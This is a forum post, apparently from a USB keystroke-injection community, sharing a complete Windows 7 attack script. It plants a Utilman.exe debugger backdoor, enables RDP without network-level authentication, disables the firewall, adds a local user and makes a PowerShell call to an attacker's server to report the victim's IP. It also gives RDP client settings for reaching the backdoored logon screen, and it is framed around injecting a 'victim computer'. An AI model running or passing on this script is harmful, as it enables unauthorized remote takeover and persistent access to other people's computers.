Jump to content

Locale Problem Workaround In Some Typical Usage


RUdude
 Share

Recommended Posts

Hi there,

just want to share some experience of different locales workaround when using exploits

like utilman https://github.com/h...utilman-exploit and creating local user with administrator rights.

The main problem that current firmware does not support russian language (and many others),

so it is impossible to change file ownership or add newly created user to admins group,

as for example in localized windows version Administrators group name also localized

(_Administratory_) (unfortunately this forum not accept RU chars and I can use russian word here) ,

so commands like these will never works

STRING icacls "%systemroot%\System32\Utilman.exe" /grant _Administratory_:F /T[/CODE]

[CODE]STRING net localgroup _Administratory_ Local000 /add[/CODE]

Post of [b]PCFreak[/b] is amazing http://forums.hak5.o...ouching-a-file/ and this helped me a lot to make such workaround.

As there is very restricted time while injecting victim computer, especially if you wil not have physical access to this PC later,

here is using also Terminal Services for getting full access. Idea to add local user with restricted righs + utilman hack 'by PCFreak',

and then remotely run cmd.exe using "Ease of Access"-button at the logon screen and promote to Admins.

After inject script make HTTP request for specified server using powershell, so you may easy find its IP address in webserver logfile.

Sure this will work only for real IP addresses, but not with fake or NAT.

Windows 7 example, ANY localization, but default keyboard input locale should be US-English anyway, unfortunately.

So before injecting try to check or change this. I do not know workaround here, let's discover together?

[CODE]
DELAY 3000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
MENU
DELAY 1000
DOWN
DELAY 200
DOWN
DELAY 200
ENTER
DELAY 1000
LEFT
DELAY 200
ENTER
DELAY 200
ENTER
STRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /d cmd.exe /f
ENTER
DELAY 200
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
ENTER
DELAY 200
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSUserEnabled /t REG_DWORD /d 1 /f
ENTER
DELAY 200
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
ENTER
DELAY 200
STRING netsh firewall set opmode disable
ENTER
DELAY 200
STRING net user Local000 /add
ENTER
DELAY 200
STRING net user Local000 *
ENTER
DELAY 200
STRING password
ENTER
DELAY 200
STRING password
ENTER
DELAY 200
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://_server_IP_address/injected_host.html','%TEMP%\~tmp932.txt');
ENTER
DELAY 200
STRING exit
ENTER
[/CODE]

This script also enables Terminal Services with old clients compartibility (without NLA) mode and disables Windows Firewall.

For connection to remote logon screen from NLA-enabled MSTSC clients like in Windows 7 you also need some client side modification,

otherwise username and password will be requested before connection to server and you never will be able to see Logon screen

and will not be able to use EoA-button. To resolve this issue you need to save empty RDP file and edit this using any editor like notepad.exe,

these params should be changed/added:

[CODE]
authentication level:i:0
enablecredsspsupport:i:0
[/CODE]

After this modification save file and connect to server, you will go directly to Logon screen. Give admin rights to your new user

and after this you'll be able to login remotely (and locally, sure)

---

BTW, another locale problem that fast keys (underlined chars in menu items) in Start menu or Right-button menu are also localized,

for this reason I am not using these like

[CODE]MENU
STRING a[/CODE]

instead of this I am select menu item using cursor keys

[CODE]
MENU
DELAY 1000
DOWN
DELAY 200
DOWN
DELAY 200
ENTER
[/CODE]

I hope it will be helpful for someone.

PS: this script will also work within Terminal Services session, so you will be able also inject remote PC using local USB port, usually it is connected to session on remote side (only fullscreen mode).

Regards from Russia :)

Edited by RUdude
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...